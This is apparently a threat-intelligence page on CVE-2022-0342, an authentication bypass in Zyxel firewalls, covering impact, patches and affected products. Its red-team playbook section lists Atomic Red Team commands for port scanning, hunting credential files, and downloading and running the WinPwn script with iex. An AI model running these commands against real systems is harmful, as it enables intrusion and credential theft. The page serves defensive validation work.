CVE-2022-0342
Overview
This vulnerability is an authentication bypass affecting the CGI program within Zyxel USG/ZyWALL series firmware. The root cause lies in improper validation of authentication tokens or session management within the web interface, allowing unauthorized access to the administrative functions. The flaw specifically impacts the web-based management component of multiple Zyxel firewall product lines across specified firmware versions.
Vulnerability Description
An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
Impact
An unauthenticated remote attacker can bypass the web authentication mechanism to gain full administrative privileges on affected Zyxel firewall devices. This access enables the attacker to modify configurations, intercept or redirect network traffic, and potentially deploy further malicious activities within the network. The exploit requires only network access to the device's management interface and no prior authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can lead to complete compromise of the firewall and underlying network infrastructure.
Solution
Zyxel has released security advisories detailing patches for affected products. Users should upgrade to firmware versions beyond 4.70 for USG/ZyWALL series, beyond 5.20 for USG FLEX, ATP, and VPN series, and beyond V1.33 Patch 4 for NSG series. The official advisory and patch instructions are available at https://www.zyxel.com/support/Zyxel-security-advisory-for-authentication-bypass-vulnerability-of-firewalls.shtml. Applying these vendor-provided firmware updates is the recommended remediation to address the authentication bypass vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An authentication bypass vulnerability exists within the CGI program of specific Zyxel firewall and VPN device firmware versions. This flaw allows unauthorized users to bypass web authentication mechanisms, potentially granting them administrative access to the affected devices. The vulnerability arises from improper validation of user credentials, which can be exploited by attackers to gain control over the device without needing valid login information. This issue affects a range of Zyxel products, including the USG, ZyWALL, USG FLEX, ATP, VPN, and NSG series, across various firmware versions. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to systems utilizing these devices.
Attack vectors for this vulnerability are particularly concerning, as they can be executed remotely without physical access to the devices. An attacker could leverage this flaw by crafting specific requests to the web interface of the affected devices, effectively bypassing authentication checks. Once administrative access is obtained, the attacker could manipulate configurations, intercept traffic, or deploy malicious payloads within the network. Scenarios may include targeting organizations with weak security postures, where the compromised device could serve as a gateway for further attacks, including data breaches and network infiltration.
The real-world impact of this vulnerability is significant, especially for businesses relying on Zyxel devices for network security. Gaining unauthorized access to a firewall or VPN device can lead to severe consequences, including data loss, service disruption, and reputational damage. Organizations may face regulatory scrutiny and financial penalties if sensitive information is exposed or compromised. Additionally, the potential for lateral movement within a network increases the risk of broader attacks, making this vulnerability a critical concern for IT security teams.
Detection and mitigation strategies are essential to protect against this vulnerability. Organizations should prioritize updating affected devices to the latest firmware versions, which include patches addressing the authentication bypass issue. Regular vulnerability assessments and penetration testing can help identify potential exploitation attempts and ensure that security measures are effective. Implementing strong access controls, such as multi-factor authentication and network segmentation, can further reduce the risk of unauthorized access. Monitoring logs for unusual access patterns or configuration changes can also aid in early detection of potential exploitation.
In conclusion, the authentication bypass vulnerability in Zyxel devices poses a critical threat to organizations utilizing these products. The ability for attackers to gain administrative access without valid credentials can lead to severe operational and reputational risks. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the exploitation of this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-0342, with a notable increase in telemetry signals indicating attempts to exploit the authentication bypass vulnerability in Zyxel devices. Although the EPSS score remains stable and no new exploit variants have been identified, the surge in detection events suggests heightened attacker interest and potential reconnaissance or exploitation efforts in the wild. This trend elevates the immediacy of the threat, as increased probing can precede more widespread or sophisticated attacks targeting administrative access. Defenders should recognize that the vulnerability remains actively targeted, reinforcing the criticality of monitoring and response capabilities. While the overall risk rating remains critical due to the vulnerability’s nature and impact, the observed escalation in exploitation attempts underscores an increased likelihood of compromise in environments with unpatched Zyxel firmware.
Affected Products (25)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Usg40 Firmware | All |
cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg40w Firmware | All |
cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg60 Firmware | All |
cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg60w Firmware | All |
cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zywall 110 Firmware | All |
cpe:2.3:o:zyxel:zywall_110_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zywall 310 Firmware | All |
cpe:2.3:o:zyxel:zywall_310_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zywall 1100 Firmware | All |
cpe:2.3:o:zyxel:zywall_1100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 100 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 200 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 500 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 100w Firmware | All |
cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 700 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100 Firmware | All |
cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100w Firmware | All |
cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | All |
cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | All |
cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp700 Firmware | All |
cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | All |
cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn50 Firmware | All |
cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn100 Firmware | All |
cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-0342 |
| zyxel.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.zyxel.com/support/Zyxel-security-advisory-for-authentication-bypass-vulnerability-of-firewalls.shtml |